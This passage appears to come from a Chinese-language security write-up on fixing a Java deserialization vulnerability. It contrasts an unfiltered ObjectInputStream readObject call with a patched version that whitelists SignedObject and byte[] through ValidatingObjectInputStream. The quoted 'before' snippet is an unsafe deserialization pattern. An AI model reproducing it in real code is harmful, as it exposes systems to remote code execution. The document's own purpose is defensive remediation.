19 | objectInputStream = new ObjectInputStream(new ByteArrayInputStream(paramArrayOfByte));
20 | SignedObject signedObject = (SignedObject)objectInputStream.readObject();
21 | ```
22 |
23 | 修复后
24 | ```java
25 | private static byte[] verify(byte[] var0, KeyConfig var1) throws IOException, ClassNotFoundException, NoSuchAlgorithmException, InvalidKeyException, SignatureException, UnrecoverableKeyException, CertificateException, KeyStoreException {
26 | // 只允许反序列化的类为 SignedObject、[B
27 | ObjectInputStream var2 = getSecureObjectInputStream(var0, SignedObject.class, byte[].class);
28 |
29 | byte[] var9;
30 | try {
31 | String var3 = "SHA1withDSA";
32 | if ("2".equals(var1.getVersion())) {
33 | var3 = "SHA512withRSA";
34 | }
35 |
36 | PublicKey var4 = getPublicKey(var1);
37 | SignedObject var5 = (SignedObject)var2.readObject();
38 | ```
39 |
40 | 修复方案
41 |
42 | ```java
43 | private static ObjectInputStream getSecureObjectInputStream(byte[] var0, Class... var1) throws IOException {
44 | ValidatingObjectInputStream var2 = new ValidatingObjectInputStream(new ByteArrayInputStream(var0));
45 | var2.accept(var1);
46 | return var2;
47 | }
48 | ```
49 |
50 | 通过 ValidatingObjectInputStream 设置白名单,只允许反序列化的类为 `SignedObject` 和 `[B`,SignedObject虽然重写了 readObect(), 但是没发现有啥可以进一步绕过的地方。
51 |
--------------------------------------------------------------------------------